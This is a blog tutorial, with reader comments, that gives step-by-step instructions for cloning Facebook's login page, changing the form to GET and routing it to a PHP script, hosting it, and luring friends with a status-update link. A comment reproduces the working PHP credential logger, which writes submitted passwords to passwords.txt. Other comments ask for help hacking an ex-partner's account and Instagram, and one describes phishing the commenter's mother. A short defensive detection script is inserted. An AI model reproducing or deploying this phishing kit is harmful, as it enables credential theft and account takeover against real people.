Social Engineering, Part 2: Hacking a Friend's Facebook Password

Welcome to the second Null Byte in a series educating you on Social Engineering awareness and techniques. Today, I'm going to show you how a savvy Social Engineer would trick a friend into unknowingly surrendering their Facebook password. My intent is to warn and demonstrate how easy it is to succumb to phishing via Social Engineering, and therefore expose yourself.

What is Phishing?

Phishing is the act of tricking someone into signing onto a fake website, which mimics a real site, such as Facebook. The phishing page will log the credentials that the user enters in the password field, and usually goes unnoticed with the right circumstances and some Social Engineering.

The phishing page is created by visiting the website you want to mock, copying the source HTML code, and then altering it to use a custom PHP script to log the victim's credentials. A good phishing page will seamlessly use cookies to bypass redirect filters. So if a cookie for the site exists, the user will be logged in and more than likely won't realize what happened.

Warnings

  • Phishing is illegal.
  • Only phish your friends who give you consent to do so.

Step 1 Get a Web Host

You need a place to host your phishing page. I like T35—they are free, and offer cPanel hosting.

  1. Make a free account on T35.
  2. Go to your email that you used and click the link confirming the account.

Step 2 Create the Phishing Page

Now we need to create the site that will log the victim's credentials.

  1. Open up a text document using notepad, or your choice in text editors.
  2. Go to the Facebook login page.
  3. Right-click somewhere on the page, and click View page source.
  4. Copy all of the contents of the source code and paste them into your text document.
  5. Hit ctrl + f, and search for "action=" and change the method to "GET", and the text to the right of "action=" to "log.php".
  6. Click File > Save as and save it with the name "index.php" (make sure to click the drop-down menu to select "all files" if it's not selected already).
  7. Make a new text file, and paste this as the contents (paste the raw text, not the numbered). This is the file written in PHP that logs the victim's login details.
  8. Save the file as "log.php". Again, make sure "all files" is selected in the file type drop-down menu.
  9. Log in to your T35 account and click Upload. Upload both files to the root of your website (not in a folder).
  10. When credentials are logged, they will be in a file called "passwords.txt" in the root of your website. Check the box next to the "passwords.txt" file when you get some logs, and click chmod. Change the file to 466 permissions, so other people can't read the victim's passwords.

Step 3 Perform the Phish

In a status update on Facebook, post something like the following:

    "Check out this funny picture of me on my website xD <post link to phishing page here>."

It's really that simple. You should start to see people's login credentials getting stored in your "passwords.txt" file. Simply because it comes from a "trusted" Facebook friend, they will go with their instincts and click the link without thinking twice about it. The best part about the PHP code posted above is that the header sends you back to the Facebook homepage, bypassing the redirect filter warning that Facebook has implemented, which will make it nearly seamless to the user who fell for it.
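Seen from the defender's side, the cloned page described above leaves three checkable traces: it is served from a host that is not Facebook's, its login form was switched to GET, and its action points at a script on that same host. The following added example (not code from the original article; `BRAND_DOMAINS`, the function names and the `photos.example.net` sample host are assumptions made for illustration) audits a page that presents itself as a Facebook login for those traces.

```python
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit

BRAND_DOMAINS = ("facebook.com",)  # assumption: hosts a genuine login may use

def on_brand_domain(url):
    """True only for a brand domain or one of its subdomains."""
    host = (urlsplit(url).hostname or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in BRAND_DOMAINS)

class LoginFormFinder(HTMLParser):
    """Collects method and action of every <form> holding a password field."""
    def __init__(self):
        super().__init__()
        self.current, self.forms = None, []

    def handle_starttag(self, tag, attrs):
        a = dict(attrs)
        if tag == "form":
            self.current = {"method": (a.get("method") or "get").lower(),
                            "action": a.get("action") or "", "password": False}
        elif tag == "input" and self.current is not None:
            if (a.get("type") or "").lower() == "password":
                self.current["password"] = True

    def handle_endtag(self, tag):
        if tag == "form" and self.current is not None:
            if self.current["password"]:
                self.forms.append(self.current)
            self.current = None

def audit_login_page(page_url, html):
    """List the reasons a page claiming to be the brand's login looks cloned."""
    finder = LoginFormFinder()
    finder.feed(html)
    findings = []
    if finder.forms and not on_brand_domain(page_url):
        findings.append("password form served from a non-brand host")
    for form in finder.forms:
        target = urljoin(page_url, form["action"])  # resolve relative actions
        if form["method"] == "get":
            findings.append("password sent with GET, so it lands in URLs and logs")
        if not on_brand_domain(target):
            findings.append("form submits to " + (urlsplit(target).hostname or "?"))
    return findings

# Constructed samples: a look-alike form and a genuine-style form.
CLONE = '<form method="GET" action="log.php"><input type="password" name="pass"></form>'
REAL = '<form method="post" action="/login/"><input type="password" name="pass"></form>'
```

The host comparison is an exact or dot-suffix match on the parsed hostname, so look-alike names such as `facebook.com.example.net` are not treated as the brand.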

Start some conversation in the Forums, or IRC channel #nullbytez on FreeNode!

Image by Richzendy

41 Comments

How is "social engineering" defined as disregarding all legal and moral boundaries? Why not actually try to make the world a better place rather than teach people how to steal from and manipulate others?

Despite what you may feel, education is the key to defeating this. I would love to live in a world where stores don't need security cameras, but the brutal truth is, con artists are everywhere you look. People will do anything to screw you out of something you worked for. I teach you how they do it so you can defend yourself. The bad people already know how to do this.

You have shown people how to create a phishing attack using this method with a stated intention of helping people to defend themselves; however, you have not outlined clearly how to defend yourself against this type of event. If you add that detail in a manner that is clear and understandable, then I think this would be an even more useful post.

There is nothing to add besides a blatant statement of the moral learned in the article. Do not click links when you do not know where they lead, and make sure you're at the site you think you are. There's no tool that will help you with this.

He explicitly states that his "intent is to warn and demonstrate how easy it is to succumb to phishing". And he certainly did warn and demonstrate how unbelievably easy it is. I really appreciate this demo because I thought it was much more complicated, and obviously it's not. Alex is making my world a better place by showing me that even a 7yr old could scam me if I don't watch the URLs. Keep teaching, Alex, I'm listening.

Greatly valued comment, thank you.

My ex put this pic of me on Facebook an email can you please help me hack her page. I don't have a page any more I don't want her to have

No, all information is here on this site. Do it yourself.

I did not know anything about phishing and stuff like that till I read this article. I would not attempt phishing on anyone, and even if I would, I would ask their consent, I mean my friends of course, and try it as an education. In that process I would learn a lot, and maybe next time when I am logging into a website that is phished I would probably know it. Great article, thanks.. :)

I am sorry for my english above I am just too tired of all the night outs for submissions.. I hate sunday nights.. :P

Don't sweat it, glad I can help :)

Are these types of techniques ever used for truly harmless pranking?

I appreciate you showing how easy such a phishing scheme is; it's good to know how and when it's done and it's good to be reminded of it. I always wondered how such a scam was pulled and thought it was much more difficult and time-consuming. Also, the fact that the user doesn't even know it happened is really scary. Isn't there some way that FB would know -- IP address or something like that? Or, when a user hovers over the status update post, would it show a domain other than FB even though it re-directs back to FB?

The user who clicked would see that the address was different, but most people would ignore it once they landed on the look-alike page. They would think they were just logged out for some reason, which does happen on Facebook.

on top of that, a lot of people don't look at their status bar, and there are also those that choose to hide it. then, when you add in the fact that facebook asks you for your password during seemingly random actions-----POW!

I love reading your posts dude. Very informative indeed!

Really like this, well it is good to be informed and it will help in relationship for bf and gf

Wow.. This blog is Amazing.. Great post !

I'm glad everyone enjoys this! Expect more great stuff to keep on coming.

I've really taken a liking to these social engineering posts. I was just talking to a friend today and his story reminded me of this. He was taking a Calculus test and he knew he was screwed. He went up to one of the girls in his class and said "Hey! The teacher said we could use our notebooks! Make sure your friends know!" She obviously told everyone and when the day of the test came, everyone in class, took out their notebooks. The teacher asked "Did I say you could use your notebooks?" to which the whole class replied "yes?" The teacher had "forgotten" that he told the class this and let them take the test with their notes. My friend is a genius...

That's a really great one :). It's hard to write any more social engineering posts...with the whole legality of things, and some people will just use it for bad stuff. I've got a few great ones too, but it's too risky because it would do more harm than good I think.

It is like the movie "Catch me if you can". Filled with social engineering tricks ;)

Alex, please, gives us food to play and test with and in same time knowledge of the vulnerabilities that exist!

Still got a bunch on the way ;). I strive to have this forum someday be able to take someone who knows only entry level computers, all the way to a hacker that can do everything on their own. Not "elite", because I will probably never earn that title, but it's what I strive for.

I would live for that day!

Awesome -- I wanna learn!

Wonderful, ty for sharing and as my Grandfather would say - "Locks are for honest people" People who want to get at your things can, they just have to try a little.

Exactly! A cheap lock won't prevent a 200 pound man from kicking a door down if he wants to steal your stuff xD.

By the way i think Alex is right. Once you are told how the attack is done you should figure out how to protect urself.

I was wondering if anyone could tell me, I've been trying this on myself using .biz.nf because the other website is no longer free... and the problem is that after I enter the credentials and hit login, none of the passwords show up in the directory?

Hello, need help with 2 issues.
I have uploaded both files.

1-but once i sign for credentials, this comes out:
Parse error: syntax error, unexpected TVARIABLE, expecting TSTRING in /home/reve/publichtml/log.php on line 10
(this will be the log.php)
and this is what i copy and paste:

<?php
header("Location: http://www.facebook.com/home.php? ");
$handle = fopen("passwords.txt", "a");
foreach($GET as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, "=");
fwrite($handle, $value);
fwrite($handle, "\r\n");
}
fwrite($handle, "\r\n");
fclose($handle);
exit;
?>

2- the Facebook "sign in page" has some letters on the top (picture attached). How can I remove those letters?

plz help me for doing this for instagram

what if i was hosting on a local server??

I've tried this personally. I copied the mobile version source and i tried it on my mobile phone with my personal account. After modifying the method and the rest, the password.txt file wasn't created on my locally hosted server.

there is no folder such as password.txt
when i uploaded files on my5gbfree.com

it won't work. the login form of facebook uses POST method, instead of GET.

When I open t35hosting.com it does not open but says 403 forbidden?? What may I do??

Hi,

Can you please tell me after Step-2, Point-8, as i am trying to do the same through Weebly.com, since T35 is no longer a free website hosting site.

Thanks.

So I challenged a friend of mine into making the most realistic version of the page and all that shenanigans, but t35 hosting is down. What's up with that?

Use a different hoster, 000webhost did the job for me and it's REALLY EASY. The only problem I got is that no "passwords.txt" file is being created, any suggestions?

(oh and I am trying to trick my mom, she doesn't know much about her tablet, and I already know her Facebook password because I made it for her)

And I am Greek!!
